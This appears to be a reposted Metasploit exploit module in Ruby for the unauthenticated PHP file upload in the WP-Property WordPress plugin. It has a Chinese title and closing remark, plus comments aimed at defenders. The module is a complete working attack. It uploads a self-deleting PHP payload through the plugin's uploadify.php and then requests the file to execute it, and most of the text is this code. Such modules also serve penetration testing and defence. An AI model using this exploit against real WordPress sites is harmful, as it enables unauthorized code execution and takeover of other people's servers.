WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

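# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below).
#
# Flow, as implemented here:
#   1. POST a multipart form to the plugin's bundled uploadify.php, carrying a
#      PHP file in the "Filedata" part and a destination in the "folder" part.
#   2. GET whatever location uploadify.php returned in its response body.
#
# Notes for defenders and reviewers:
#   * Neither request carries a session cookie, credentials or a nonce, so the
#     endpoint has to be treated as reachable by anyone who can reach the site.
#   * In web-server logs the sequence is a POST to
#     wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#     followed by a GET for the path that POST returned; the uploaded file is
#     named with five random letters plus ".php".
#   * The payload is requested with :unlink_self => true, so the uploaded
#     script presumably deletes itself after it runs (confirm against the
#     PhpEXE mixin). A clean plugin directory is therefore not evidence that
#     nothing was executed; rely on request logs instead.
#   * General hardening that removes this class of issue: move to a plugin
#     release newer than the affected range, deny direct requests to the
#     bundled third-party/uploadify/ directory, and disable PHP execution in
#     directories the web server can write to.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and its single option.
  #
  # info - Hash of metadata supplied by the framework; merged with the values
  #        below through update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          # The generated payload must not contain a NUL byte.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        # Base path of the WordPress installation; defaults to /wordpress.
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Reports whether the plugin's upload endpoint is reachable.
  #
  # Returns Exploit::CheckCode::Appears when a GET for uploadify.php answers
  # with HTTP 200, and Exploit::CheckCode::Unknown when there is no response
  # or any other status.
  #
  # A 200 only shows that the file can be requested. Nothing here reads the
  # plugin version, so "Appears" is a reachability signal, not proof that the
  # installed release is in the affected range.
  def check
    uri = target_uri.path
    # String#<< appends in place to the string returned by target_uri.path.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php and then requests it.
  #
  # Fails with Exploit::Failure::UnexpectedReply when the upload response is
  # missing, is not HTTP 200, or does not mention the uploaded file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter name, kept in an instance variable.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form fields: the file itself and the directory it should land in.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary marker at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the next request URI, so the
    # endpoint presumably answers with the stored file's path.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end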

不要问我这写的是什么 怎么利用 我是说msf.